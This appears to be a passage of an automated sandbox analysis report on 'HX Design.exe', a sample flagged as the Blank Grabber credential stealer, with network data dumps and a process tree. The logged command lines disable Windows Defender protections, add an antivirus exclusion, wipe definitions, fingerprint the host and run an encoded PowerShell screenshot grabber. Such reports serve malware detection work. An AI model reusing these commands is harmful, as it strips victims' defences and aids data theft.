2024-12-21 04:57:40 UTC	16384	OUT	Data Raw: bb d3 42 57 1d c5 9e 4f 1f 48 86 75 8d ff 78 54 25 68 b3 e5 ed 17 95 d4 a8 00 ce 9f 93 3b 40 90 9e 8b eb 32 7a 8f e7 97 f5 a1 7d ab f9 f7 65 34 20 77 21 b6 a7 70 e6 d7 61 12 3c 60 aa 7d fe 2c 49 0d a2 3e 12 74 64 59 ce e6 1a 16 5b 4f d4 60 dc 4c 64 ec 77 17 bd 95 a0 8f 75 c8 39 fd 24 58 1a 72 c3 30 01 d9 7d 50 93 40 85 cb 53 85 32 56 31 2b b8 0f 15 2b 59 e0 af aa 61 b0 07 fa e8 ce 5b d8 e0 c7 74 ee 0c 47 ee 9c e6 eb bd 09 a7 94 f7 e4 5b 15 bc 46 c4 7e f5 94 c1 5b 74 2d 0d d8 f3 0d f1 06 15 ed 8d d2 95 7b cc 67 cb 21 92 20 da 7d a6 f1 b5 73 a3 5b fd be 87 b6 27 04 cb 4e 62 a7 96 14 90 4a 6b 0f ce fd 63 02 c7 aa 16 bf bb 53 52 e4 aa 7f 7b 1c 2c ee 9e 6c 9e 96 6b 6f 9a 01 ef e1 a2 ff 40 a4 44 10 69 f3 49 34 7d 41 6f 1e 5d 4e 8e 2c 96 45 e3 17 9c 52 c2 96 c7 Data Ascii: BWOHuxT%h;@2z}e4 w!pa<`},I>tdY[O`Ldwu9$Xr0}P@S2V1++Ya[tG[F~[t-{g! }s['NbJkcSR{,lko@DiI4}Ao]N,ER
2024-12-21 04:57:40 UTC	16384	OUT	Data Raw: 18 b8 97 b7 4e 60 54 86 b5 41 72 ff 1a 74 03 dc 1a 55 27 08 53 0d 46 bd 59 44 a4 42 91 a6 1d 2a cb f3 08 b2 d6 9a 7e 80 d9 af 84 19 d9 e1 97 19 37 f9 15 9d 5d 71 64 f1 8b 45 2b 85 af c2 1b 7f 7f ab e2 0b d7 24 34 0f 6b da f9 bb f9 b3 94 45 aa bb 40 c6 38 c4 71 48 da 11 10 12 7d b3 ef 39 a2 36 00 57 02 2d 21 bc ff 46 83 97 03 84 43 de c4 b5 98 75 67 ec f5 1e 59 f5 f3 58 6c b5 1d 85 a7 87 36 de 7d 31 b3 a9 59 bd f9 64 23 5f 56 b3 3b fb ae 74 04 c2 12 f6 fe 11 a8 3c b9 43 53 9b 7c cd 55 39 01 0e 3e 7a cc 45 d6 14 1e 1c b4 86 8b f6 48 66 49 30 0a a8 70 4b 28 52 fa dc 44 60 8c 47 8a 6a 4f e9 8a d7 bf e1 ad be 33 25 c9 ef d6 7f 47 88 37 65 68 ad 7f fc 16 41 dc f1 09 d2 e6 d7 eb c8 21 0d c0 9a 12 c5 17 c4 fd 46 c3 9a 7e 2c 4f 60 5c 49 8c 49 4e ca 09 33 84 ee c1 Data Ascii: N`TArtU'SFYDB*~7]qdE+$4kE@8qH}96W-!FCugYXl6}1Yd#_V;t<CS\|U9>zEHfI0pK(RD`GjO3%G7ehA!F~,O`\IIN3
2024-12-21 04:57:40 UTC	16384	OUT	Data Raw: 04 c9 21 ff 36 ac e2 0b 54 82 6b 20 dd bb 2b a5 4e ab 7f 5d 82 7e 3d f2 5a 2e 4f 98 67 ab dc 06 67 05 b8 01 f7 ce 8c 97 07 cc 37 e9 dc ef 77 ff af 82 44 38 40 20 e8 81 e9 88 b5 48 0f 6d 47 bc 05 88 a0 02 8d 30 ff 35 e9 53 a6 a2 82 3a a4 8b e6 c9 46 ed d3 11 45 00 e3 11 db 20 c6 e6 24 1f b8 59 d2 69 78 ad cb 61 f3 1d 30 98 9c 91 1c 2d 4c 7b 3b d7 18 06 bc 81 37 40 ef 2a b2 47 1d 43 88 29 a2 e1 f2 53 18 74 12 83 a3 6f 17 a4 61 03 31 16 8c b7 66 81 72 07 56 60 3a 60 0e c4 ee 7f 84 e8 ff 22 72 8b 14 9c 06 38 f7 15 cc cc ac 41 73 8e e0 24 7d d5 d7 5d 79 54 3d 63 d5 b4 4b df 0b 70 8c d5 59 65 e6 20 34 34 df 01 62 c2 f4 af a6 16 e2 c4 8a d0 a5 10 bc 0a 5d 9c 9a b1 d8 b9 bc c3 e1 e2 85 bd 05 5b f4 08 ea c8 c4 15 0d 04 f6 3a f0 be 2d 9c 5d c1 5c 81 02 25 fe 40 8a Data Ascii: !6Tk +N]~=Z.Ogg7wD8@ HmG05S:FE $Yixa0-L{;7@*GC)Stoa1frV`:`"r8As$}]yT=cKpYe 44b][:-]\%@
2024-12-21 04:57:40 UTC	16384	OUT	Data Raw: b8 f8 fd ba 06 14 9e 27 ae b4 aa 22 b7 18 3f d2 82 ab 21 d5 28 8f 8a e8 27 ac 44 d0 3a cf fc bf be 59 86 4e fa 88 06 da 30 1b b0 48 dd a1 98 94 41 30 3c 8e 0c f3 52 97 84 40 2a 9c 38 47 19 a1 8f 90 71 34 7b 35 68 8f bc f4 e7 c9 50 d8 43 fe 89 31 f0 10 0d 0d d1 23 83 77 ab 3d ba 9c e5 15 3c ea 8b eb 88 2c 29 f5 e3 47 ac 0f ce 89 b4 94 eb ed 99 e0 0d ae 56 5a d4 b0 fb e3 07 cc c4 9b 51 f0 0b 2a 94 a4 52 33 1b 7e f4 b3 fa d1 87 9a 00 e6 44 e3 f9 cd 00 99 c0 ff 27 c8 9f fc be 6c 83 2d f4 5d 33 00 69 a4 46 93 da 28 64 35 94 07 6d d8 e3 5b be 24 a7 94 7f 6b b3 00 bb 2c c8 17 8a 6c 96 8f e5 67 1b 3b 9e 59 e6 62 36 73 1b b1 c1 28 93 dd 9c 30 33 ed b3 7a c1 44 20 08 f0 b4 95 b3 ed 72 37 ea 86 9d ff a7 a7 9a 44 71 55 7e 63 aa 0e d4 74 3a 36 33 e1 c8 7f cc 38 10 8f Data Ascii: '"?!('D:YN0HA0<R@8Gq4{5hPC1#w=<,)GVZQR3~D'l-]3iF(d5m[$k,lg;Yb6s(03zD r7DqU~ct:638
2024-12-21 04:57:40 UTC	16384	OUT	Data Raw: 2e 85 e4 10 43 5f a0 c6 4b 38 03 a1 6d 0c 79 1a 46 d5 c4 54 b2 42 d6 2b e3 9e 21 3e 5f 76 e1 18 4e f3 bb 4a 5b 2c 45 77 18 86 63 c2 44 03 78 29 8f 2d 81 26 96 ef a8 95 f1 82 dc 6f 67 9e fb 83 59 ca 2d 52 32 33 e1 9c 12 8d 9c 38 a5 90 01 e9 ca 4a cc 7c 37 51 eb 79 00 1c 1b 93 a8 49 7e 32 24 72 b9 f6 f4 a7 d2 b3 3f 28 d7 45 59 19 0a 7b d0 a1 c8 28 c5 f1 42 88 eb 4b 23 dc fc 92 a5 b6 3b e0 b7 e0 a5 d6 98 c1 00 1a d5 90 d6 48 f6 ff 88 92 4f 39 2e 13 17 ed 52 b8 a5 21 b6 d1 6b 13 11 b7 2a a3 83 fe 6b 32 07 64 0e 45 16 e8 10 94 17 e6 f8 23 6f a9 9f e1 72 66 00 77 6b 47 6e 16 66 75 96 be 93 59 b3 37 a6 c2 58 c6 4e f5 2d 4f 79 f3 6a 52 d0 48 2a 34 ca 37 6d a5 f7 70 b6 a1 19 47 a9 c0 48 0b 95 0b b3 95 0f 2a fb c8 1a e1 7b d9 09 08 a1 74 e9 d6 42 90 89 ee 33 c8 73 Data Ascii: .C_K8myFTB+!>_vNJ[,EwcDx)-&ogY-R238J\|7QyI~2$r?(EY{(BK#;HO9.R!kk2dE#orfwkGnfuY7XN-OyjRH47mpGH*{tB3s
2024-12-21 04:57:43 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 21 Dec 2024 04:57:42 GMT Content-Type: application/json Content-Length: 1639 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Target ID:	0
Start time:	23:56:59
Start date:	20/12/2024
Path:	C:\Users\user\Desktop\HX Design.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\HX Design.exe"
Imagebase:	0x7ff732060000
File size:	9'441'536 bytes
MD5 hash:	55933983C78673A3D30C3D7F8BD54B83
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1678275226.000001631A8D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1678275226.000001631A8D4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	23:57:01
Start date:	20/12/2024
Path:	C:\Users\user\Desktop\HX Design.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\HX Design.exe"
Imagebase:	0x7ff732060000
File size:	9'441'536 bytes
MD5 hash:	55933983C78673A3D30C3D7F8BD54B83
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	23:57:06
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	23:57:06
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	23:57:06
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	23:57:06
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	23:57:06
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	23:57:06
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	23:57:06
Start date:	20/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	23:57:06
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	23:57:06
Start date:	20/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff62a660000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	23:57:06
Start date:	20/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	23:57:06
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	23:57:06
Start date:	20/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff6d7c90000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	23:57:10
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	23:57:10
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	23:57:10
Start date:	20/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Imagebase:	0x7ff6416e0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	23:57:10
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	23:57:11
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	23:57:11
Start date:	20/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Imagebase:	0x7ff6416e0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	23:57:11
Start date:	20/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	23:57:11
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	23:57:11
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	23:57:11
Start date:	20/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6d7c90000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	23:57:12
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1456, Parent PID: 6576

General

Target ID:	25
Start time:	23:57:12
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	23:57:12
Start date:	20/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6d7c90000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	23:57:16
Start date:	20/12/2024
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase:	0x7ff633b70000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	23:57:16
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 7296, Parent PID: 7524

General

Target ID:	30
Start time:	23:57:16
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7556, Parent PID: 6308

General

Target ID:	31
Start time:	23:57:16
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	23:57:16
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	23:57:16
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	23:57:16
Start date:	20/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff62a660000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	23:57:16
Start date:	20/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff62a660000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	23:57:16
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwB